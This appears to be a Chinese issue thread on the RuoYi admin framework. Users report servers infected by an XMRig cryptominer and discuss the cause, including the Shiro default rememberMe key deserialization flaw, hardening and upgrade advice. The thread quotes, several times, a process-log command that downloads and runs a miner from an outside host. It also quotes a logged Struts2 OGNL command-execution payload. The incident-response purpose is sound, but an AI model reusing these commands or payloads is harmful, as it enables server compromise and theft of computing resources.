命令行: curl https://whatsmyipv4.cf/xmrig -o /tmp/watchdog
进程PID: 7827
进程文件名: curl
父进程ID: 7826
父进程文件路径: /usr/bin/bash
进程链:
-[2337] java -Xms2048m -Xmx2048m -XX:PermSize=2048m -XX:MaxPermSize=2048m -XX:MaxNewSize=1024m -jar ruoyi-admin.jar
-[7823] /bin/sh -c pidof /tmp/watchdog || bash -c 'curl https://whatsmyipv4.cf/xmrig -o /tmp/watchdog && chmod +x /tmp/watchdog && nohup /tmp/watchdog --donate-level 1 -o sg.minexmr.com:443 -u 44BwEPy6EAHMgi7x2SXq1v3kdokMgKFvxfKSr5jWEY6y7hVn7pLCe61AEvgogFDUoCKHE6P5BMHZj2UpMpyhwobY2ZR89vT -k --tls &'
-[7825] bash -c curl https://whatsmyipv4.cf/xmrig -o /tmp/watchdog && chmod +x /tmp/watchdog && nohup /tmp/watchdog --donate-level 1 -o sg.minexmr.com:443 -u 44BwEPy6EAHMgi7x2SXq1v3kdokMgKFvxfKSr5jWEY6y7hVn7pLCe61AEvgogFDUoCKHE6P5BMHZj2UpMpyhwobY2ZR89vT -k --tls &
-[7826] bash -c curl https://whatsmyipv4.cf/xmrig -o /tmp/watchdog && chmod +x /tmp/watchdog && nohup /tmp/watchdog --donate-level 1 -o sg.minexmr.com:443 -u 44BwEPy6EAHMgi7x2SXq1v3kdokMgKFvxfKSr5jWEY6y7hVn7pLCe61AEvgogFDUoCKHE6P5BMHZj2UpMpyhwobY2ZR89vT -k --tls &

在1.23 同样被挖矿木马植入：
#I2F83H:阿里云告警漏洞，这个有遇到过吗？
今天下午，再次被同样木马植入，估计这个项目里面是有漏洞了，这个issue未解决前，先不要关闭了.

目前日志中看到可疑攻击日志：

13:20:17.032 [http-nio-8086-exec-23] ERROR o.a.c.c.C.[.[.[.[dispatcherServlet] - [log,175] - Servlet.service() for servlet [dispatcherServlet] in context with path [] threw exception [Filtered request failed.] with root cause
org.apache.tomcat.util.http.fileupload.InvalidFileNameException: Invalid file name: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo 88abe7aec077a15790f980021370c769').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}\0b
	at org.apache.tomcat.util.http.fileupload.util.Streams.checkFileName(Streams.java:188)
	at org.apache.tomcat.util.http.fileupload.impl.FileItemStreamImpl.getName(FileItemStreamImpl.java:157)
	at org.apache.tomcat.util.http.fileupload.FileUploadBase.parseRequest(FileUploadBase.java:286)
	at org.apache.catalina.connector.Request.parseParts(Request.java:2895)
	at org.apache.catalina.connector.Request.parseParameters(Request.java:3228)
	at org.apache.catalina.connector.Request.getParameter(Request.java:1127)
	at org.apache.catalina.connector.RequestFacade.getParameter(RequestFacade.java:381)
	at javax.servlet.ServletRequestWrapper.getParameter(ServletRequestWrapper.java:158)
	at org.apache.shiro.web.session.mgt.DefaultWebSessionManager.getReferencedSessionId(DefaultWebSessionManager.java:136)
	at org.apache.shiro.web.session.mgt.DefaultWebSessionManager.getSessionId(DefaultWebSessionManager.java:279)
	at org.apache.shiro.web.session.mgt.DefaultWebSessionManager.getSessionId(DefaultWebSessionManager.java:273)
	at org.apache.shiro.session.mgt.DefaultSessionManager.retrieveSession(DefaultSessionManager.java:216)
	at org.apache.shiro.session.mgt.AbstractValidatingSessionManager.doGetSession(AbstractValidatingSessionManager.java:118)
	at org.apache.shiro.session.mgt.AbstractNativeSessionManager.lookupSession(AbstractNativeSessionManager.java:148)
	at org.apache.shiro.session.mgt.AbstractNativeSessionManager.getSession(AbstractNativeSessionManager.java:140)
	at org.apache.shiro.mgt.SessionsSecurityManager.getSession(SessionsSecurityManager.java:156)
	at org.apache.shiro.mgt.DefaultSecurityManager.resolveContextSession(DefaultSecurityManager.java:461)
	at org.apache.shiro.mgt.DefaultSecurityManager.resolveSession(DefaultSecurityManager.java:447)
	at org.apache.shiro.mgt.DefaultSecurityManager.createSubject(DefaultSecurityManager.java:343)
	at org.apache.shiro.subject.Subject$Builder.buildSubject(Subject.java:845)
	at org.apache.shiro.web.subject.WebSubject$Builder.buildWebSubject(WebSubject.java:148)
	at org.apache.shiro.web.servlet.AbstractShiroFilter.createSubject(AbstractShiroFilter.java:292)
	at org.apache.shiro.web.servlet.AbstractShiroFilter.doFilterInternal(AbstractShiroFilter.java:359)
	at org.apache.shiro.web.servlet.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:125)
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
	at com.alibaba.druid.support.http.WebStatFilter.doFilter(WebStatFilter.java:124)
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
	at org.springframework.web.filter.RequestContextFilter.doFilterInternal(RequestContextFilter.java:100)
	at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:119)
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
	at org.springframework.web.filter.FormContentFilter.doFilterInternal(FormContentFilter.java:93)
	at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:119)
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
	at org.springframework.web.filter.CharacterEncodingFilter.doFilterInternal(CharacterEncodingFilter.java:201)
	at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:119)
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
	at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:202)
	at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:97)
	at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:542)
	at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:143)
	at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:92)
	at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:78)
	at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:343)
	at org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:374)
	at org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:65)
	at org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:888)
	at org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1597)
	at org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49)
	at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
	at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
	at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
	at java.lang.Thread.run(Thread.java:748)

@红亮 @haiya_oschina @zhangjn
被攻击没有办法，你只能做防护，而且你们发的这些信息都不像是框架的原因
1、上面的命令明显被挂马了，Windows 的还是第一次见到，可以找找相关资料
2、你发的异常信息那是已经拦截了，如果命令被执行，那不会出现异常的，都异常了哪有漏洞？不想显示异常可以全局捕获这个异常做自定义提示
对于矿机木马，一般都是redis、mysql、pgsql出现的，从弱口令登录后做的进程挂马，很少有从系统登录挂马的，除非你系统有不需要登录访问的接口，给你一个解除木马的方法：记一次服务器linux（centos7）被postgres病毒攻击的事故，这个我用过，是管用的，另外，除了应用端口，其他端口不要对外开放，一般配置如下
1、只开放80、8443/443、远程登录端口（不要用默认的，比如22或者3389，也可以做端口转发或者ssh转发）
2、禁止ping
3、服务器登录密码使用64位随机数，定期更换密码
4、服务器设置登录失败延时策略（对爆破式攻击基本无效，可以不做设置）
5、设置指定ip访问远程

另外，去查询你们服务器的登录日志，多数都是爆破攻击

附其他类似解决方案
【应急类漏洞】Linux下变种DDG挖矿病毒紧急通告及处置方法
watchdogs挖矿木马综合分析报告

@Ricky
1、目前看服务器上没有出现直接被登录系统挂马的情况，都有采取ssh和公司ip才能登陆服务器，这种情况不考虑。
2、我知道上面的日志是被拦截了的，说明还是出现了没有被拦截到，并且没有日志记录的挂马。
3、从父进程看确实是从ruoyi这个进程引入的任意命令行执行漏洞，当然具体是ruoyi内部引入的第三方框架问题还是ruoyi本身的问题，目前我这边定位不出来。
4、服务器端口都严格的防火墙控制，暂时不考虑这个导致。
5、目前的临时解决方案是直接利用java安全机制（SecurityManager）禁止掉外部命令执行（不能根治！）

目前已经在这个框架中 多系统，多人，多次 出现被挂马，而且是任意执行命令，已经严重可以 直接删除服务器任何东西和获取任意数据 ，请重视起来，最终的目标是找到漏洞解决掉，而不是一直推给框架以外的第三方，虽然可能是第三方导致，但是毕竟是在这里发生了。

已经发生两次了，再发生一次，估计我要被炒鱿鱼，看来也要准备第二套方案，看看能不能迁移到别的框架了

刚去检查另外一个服务器，也是用了这个ruoyi框架，同样被挂了一样的挖矿木马,这还能玩……

@红亮 可以试试停掉这台服务器上的应用，删除有关的项目，在其他服务器上用war部署一下先跑着，这样你就可以确定是服务器的问题还是项目的问题

看日志的话是有恶意脚本在上传，系统除了几个公开的地址能访问，其他的均会被拦截。需登录后查才能访问。

所以你可以按照这个思路先去检查一下，首先上传的路径是profile，检查这个路径下面是否有被上传过恶意脚本，这个也是需要登录后才能进行上传。（我觉得如果是系统问题的话，有可能是这里出现的问题，这个通用上传也都有一些限制条件，不符合规范的会抛出异常）

ruoyi:
  # 文件路径 示例（ Windows配置D:/ruoyi/uploadPath，Linux配置 /home/ruoyi/uploadPath）
  profile: D:/ruoyi/uploadPath

如果没有，那极有可能是其他插件或服务导致，其他的服务可以自己检查一下，tomcat可以升级或更换jetty、undertow等容器在进行观察。

这种木马以前也有中过，都是redis、mysql等导致。不过也不排除是其他的问题，如果后续有反馈并且和框架相关漏洞会进行通知。或者你有更详细的内容也可以陆续提供上来参考分析。

如果有对外开放的上传接口，建议做加密参数，文件落地前进行验签，脚本落地才能执行

@Ricky @若依 好久没关注这个issue了，看了你们的回复，我是觉得你们没有认真看上面的攻击路径，这个根本不是文件上传，是有地方动态执行了jvm的shell命令，而且看上面阿里云给的路径就知道就是ruoyi对应的java.exe执行的，我是直接禁用了任何jvm调用shell命令后，才没有再次中马。

我觉得方向可能是这个后台有什么地方能执行jvm shell命令，比如那个获取系统信息的好像会执行，具体是怎么攻击的，我也不清楚，我只能从最后生效的位置堵上漏洞

命令执行漏洞 RuoYi <= v4.3.0
若依管理系统使用了Apache Shiro，Shiro 提供了记住我（RememberMe）的功能，下次访问时无需再登录即可访问。系统将密钥硬编码在代码里，且在官方文档中并没有强调修改该密钥，导致框架使用者大多数都使用了默认密钥。攻击者可以构造一个恶意的对象，并且对其序列化、AES加密、base64编码后，作为cookie的rememberMe字段发送。Shiro将rememberMe进行解密并且反序列化，最终造成反序列化漏洞，进而在目标机器上执行任意命令。

检测漏洞：ShiroConfig.java 是否包含 fCq+/xW488hMTCD+cmJ3aQ==，如果是使用的默认密钥则需要修改，防止被执行命令攻击。

解决方案：升级版本到 >=v.4.3.1，并且重新生成一个新的秘钥替换cipherKey，保证唯一且不要泄漏。

阿里云版本
uname -a
Linux api.xxx.com 3.10.0-957.21.2.el7.x86_64 Wed Jun 5 14:26:44 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

若依版本 v4.6.0

bash -c curl https://whatsmyipv4.cf/xmrig -o /tmp/watchdog && chmod +x /tmp/watchdog && nohup /tmp/watchdog --donate-level 1 -o sg.minexmr.com:443 -u 44BwEPy6EAHMgi7x2SXq1v3kdokMgKFvxfKSr5jWEY6y7hVn7pLCe61AEvgogFDUoCKHE6P5BMHZj2UpMpyhwobY2ZR89vT -k --tls &
也出现了这个问题

note_5057301

我们阿里云服务器也出现这个问题，希望作者重视
-[32059] java -jar -Xms256m -Xmx1024m -XX:MetaspaceSize=128m -XX:MaxMetaspaceSize=512m ruoyi.jar
-[28294] /bin/sh -c pidof /tmp/watchdog || bash -c 'curl https://whatsmyipv4.cf/xmrig -o /tmp/watchdog && chmod +x /tmp/watchdog && nohup /tmp/watchdog --donate-level 1 -o sg.minexmr.com:443 -u 44BwEPy6EAHMgi7x2SXq1v3kdokMgKFvxfKSr5jWEY6y7hVn7pLCe61AEvgogFDUoCKHE6P5BMHZj2UpMpyhwobY2ZR89vT -k --tls &'
-[28297] bash -c curl https://whatsmyipv4.cf/xmrig -o /tmp/watchdog && chmod +x /tmp/watchdog && nohup /tmp/watchdog --donate-level 1 -o sg.minexmr.com:443 -u 44BwEPy6EAHMgi7x2SXq1v3kdokMgKFvxfKSr5jWEY6y7hVn7pLCe61AEvgogFDUoCKHE6P5BMHZj2UpMpyhwobY2ZR89vT -k --tls &
-[28298] bash -c curl https://whatsmyipv4.cf/xmrig -o /tmp/watchdog && chmod +x /tmp/watchdog && nohup /tmp/watchdog --donate-level 1 -o sg.minexmr.com:443 -u 44BwEPy6EAHMgi7x2SXq1v3kdokMgKFvxfKSr5jWEY6y7hVn7pLCe61AEvgogFDUoCKHE6P5BMHZj2UpMpyhwobY2ZR89vT -k --tls &

同样，我也遇上了同样问题，一个月内两次发现CPU被watchdog上的某进程吃满。

uname -a

Linux ebs-5811 4.18.0-193.el8.x86_64 #1:用户新增密码未加密 删除逻辑应增加判断 SMP Fri May 8 10:59:10 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

若依 v4.6.0

ps -ef |grep watchdog

root 12 2 0 Jun26 ? 00:00:00 [watchdog/0]
root 15 2 0 Jun26 ? 00:00:00 [watchdog/1]
root 37 2 0 Jun26 ? 00:00:00 [watchdogd]
root 2893 1 0 Jun26 ? 00:00:00 bash -c curl https://whatsmyipv4.cf/xmrig -o /tmp/watchdog && chmod +x /tmp/watchdog && nohup /tmp/watchdog --donate-level 1 -o sg.minexmr.com:443 -u 44BwEPy6EAHMgi7x2SXq1v3kdokMgKFvxfKSr5jWEY6y7hVn7pLCe61AEvgogFDUoCKHE6P5BMHZj2UpMpyhwobY2ZR89vT -k --tls &
root 2897 2893 99 Jun26 ? 7-03:59:59 /tmp/watchdog --donate-level 1 -o sg.minexmr.com:443 -u 44BwEPy6EAHMgi7x2SXq1v3kdokMgKFvxfKSr5jWEY6y7hVn7pLCe61AEvgogFDUoCKHE6P5BMHZj2UpMpyhwobY2ZR89vT -k --tls
root 291837 290001 0 14:48 pts/0 00:00:00 grep --color=auto watchdog

我也遇上了同样的问题，部署了若依的项目后，测试，生产系统都被植入了挖矿木马，望解决

攻击补充
01:13:30.597 [http-nio-9070-exec-28] WARN o.a.s.m.AbstractRememberMeManager - [onRememberedPrincipalFailure,449] - There was a failure while trying to retrieve remembered principals. This could be due to a configuration problem or corrupted principals. This could also be due to a recently changed encryption key, if you are using a shiro.ini file, this property would be 'securityManager.rememberMeManager.cipherKey' see: http://shiro.apache.org/web.html#Web-RememberMeServices. The remembered identity will be forgotten and not used for this request.
01:13:30.599 [http-nio-9070-exec-28] WARN o.a.s.m.DefaultSecurityManager - [getRememberedIdentity,617] - Delegate RememberMeManager instance of type [org.apache.shiro.web.mgt.CookieRememberMeManager] threw an exception during getRememberedPrincipals().
org.apache.shiro.crypto.CryptoException: Unable to correctly extract the Initialization Vector or ciphertext.
at org.apache.shiro.crypto.JcaCipherService.decrypt(JcaCipherService.java:378)
at org.apache.shiro.mgt.AbstractRememberMeManager.decrypt(AbstractRememberMeManager.java:482)
at org.apache.shiro.mgt.AbstractRememberMeManager.convertBytesToPrincipals(AbstractRememberMeManager.java:419)
at org.apache.shiro.mgt.AbstractRememberMeManager.getRememberedPrincipals(AbstractRememberMeManager.java:386)
at org.apache.shiro.mgt.DefaultSecurityManager.getRememberedIdentity(DefaultSecurityManager.java:612)
at org.apache.shiro.mgt.DefaultSecurityManager.resolvePrincipals(DefaultSecurityManager.java:500)
at org.apache.shiro.mgt.DefaultSecurityManager.createSubject(DefaultSecurityManager.java:346)
at org.apache.shiro.subject.Subject$Builder.buildSubject(Subject.java:845)
at org.apache.shiro.web.subject.WebSubject$Builder.buildWebSubject(WebSubject.java:148)
at org.apache.shiro.web.servlet.AbstractShiroFilter.createSubject(AbstractShiroFilter.java:292)
at org.apache.shiro.web.servlet.AbstractShiroFilter.doFilterInternal(AbstractShiroFilter.java:359)
at org.apache.shiro.web.servlet.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:125)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
at com.alibaba.druid.support.http.WebStatFilter.doFilter(WebStatFilter.java:124)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
at org.springframework.web.filter.RequestContextFilter.doFilterInternal(RequestContextFilter.java:99)
at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
at org.springframework.web.filter.FormContentFilter.doFilterInternal(FormContentFilter.java:92)
at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
at org.springframework.web.filter.HiddenHttpMethodFilter.doFilterInternal(HiddenHttpMethodFilter.java:93)
at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
at org.springframework.web.filter.CharacterEncodingFilter.doFilterInternal(CharacterEncodingFilter.java:200)
at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:199)
at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:96)
at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:490)
at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:139)
at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:92)
at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:74)
at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:343)
at org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:408)
at org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:66)
at org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:791)
at org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1417)
at org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49)
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
at java.lang.Thread.run(Thread.java:748)
Caused by: java.lang.ArrayIndexOutOfBoundsException: null
at java.lang.System.arraycopy(Native Method)
at org.apache.shiro.crypto.JcaCipherService.decrypt(JcaCipherService.java:370)
... 48 common frames omitted
01:13:31.558 [http-nio-9070-exec-29] WARN o.a.s.m.AbstractRememberMeManager - [onRememberedPrincipalFailure,449] - There was a failure while trying to retrieve remembered principals. This could be due to a configuration problem or corrupted principals. This could also be due to a recently changed encryption key, if you are using a shiro.ini file, this property would be 'securityManager.rememberMeManager.cipherKey' see: http://shiro.apache.org/web.html#Web-RememberMeServices. The remembered identity will be forgotten and not used for this request.
01:13:31.559 [http-nio-9070-exec-29] WARN o.a.s.m.DefaultSecurityManager - [getRememberedIdentity,617] - Delegate RememberMeManager instance of type [org.apache.shiro.web.mgt.CookieRememberMeManager] threw an exception during getRememberedPrincipals().
org.apache.shiro.crypto.CryptoException: Unable to execute 'doFinal' with cipher instance [javax.crypto.Cipher@1126cfed].
at org.apache.shiro.crypto.JcaCipherService.crypt(JcaCipherService.java:462)
at org.apache.shiro.crypto.JcaCipherService.crypt(JcaCipherService.java:445)
at org.apache.shiro.crypto.JcaCipherService.decrypt(JcaCipherService.java:390)
at org.apache.shiro.crypto.JcaCipherService.decrypt(JcaCipherService.java:382)
at org.apache.shiro.mgt.AbstractRememberMeManager.decrypt(AbstractRememberMeManager.java:482)
at org.apache.shiro.mgt.AbstractRememberMeManager.convertBytesToPrincipals(AbstractRememberMeManager.java:419)
at org.apache.shiro.mgt.AbstractRememberMeManager.getRememberedPrincipals(AbstractRememberMeManager.java:386)
at org.apache.shiro.mgt.DefaultSecurityManager.getRememberedIdentity(DefaultSecurityManager.java:612)
at org.apache.shiro.mgt.DefaultSecurityManager.resolvePrincipals(DefaultSecurityManager.java:500)
at org.apache.shiro.mgt.DefaultSecurityManager.createSubject(DefaultSecurityManager.java:346)
at org.apache.shiro.subject.Subject$Builder.buildSubject(Subject.java:845)
at org.apache.shiro.web.subject.WebSubject$Builder.buildWebSubject(WebSubject.java:148)
at org.apache.shiro.web.servlet.AbstractShiroFilter.createSubject(AbstractShiroFilter.java:292)
at org.apache.shiro.web.servlet.AbstractShiroFilter.doFilterInternal(AbstractShiroFilter.java:359)
at org.apache.shiro.web.servlet.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:125)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
at com.alibaba.druid.support.http.WebStatFilter.doFilter(WebStatFilter.java:124)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
at org.springframework.web.filter.RequestContextFilter.doFilterInternal(RequestContextFilter.java:99)
at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
at org.springframework.web.filter.FormContentFilter.doFilterInternal(FormContentFilter.java:92)
at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
at org.springframework.web.filter.HiddenHttpMethodFilter.doFilterInternal(HiddenHttpMethodFilter.java:93)
at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
at org.springframework.web.filter.CharacterEncodingFilter.doFilterInternal(CharacterEncodingFilter.java:200)
at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:199)
at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:96)
at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:490)
at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:139)
at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:92)
at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:74)
at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:343)
at org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:408)
at org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:66)
at org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:791)
at org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1417)
at org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49)
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
at java.lang.Thread.run(Thread.java:748)
Caused by: javax.crypto.BadPaddingException: Given final block not properly padded. Such issues can arise if a bad key is used during decryption.
at com.sun.crypto.provider.CipherCore.unpad(CipherCore.java:975)
at com.sun.crypto.provider.CipherCore.fillOutputBuffer(CipherCore.java:1056)
at com.sun.crypto.provider.CipherCore.doFinal(CipherCore.java:853)
at com.sun.crypto.provider.AESCipher.engineDoFinal(AESCipher.java:446)
at javax.crypto.Cipher.doFinal(Cipher.java:2168)
at org.apache.shiro.crypto.JcaCipherService.crypt(JcaCipherService.java:459)
... 51 common frames omitted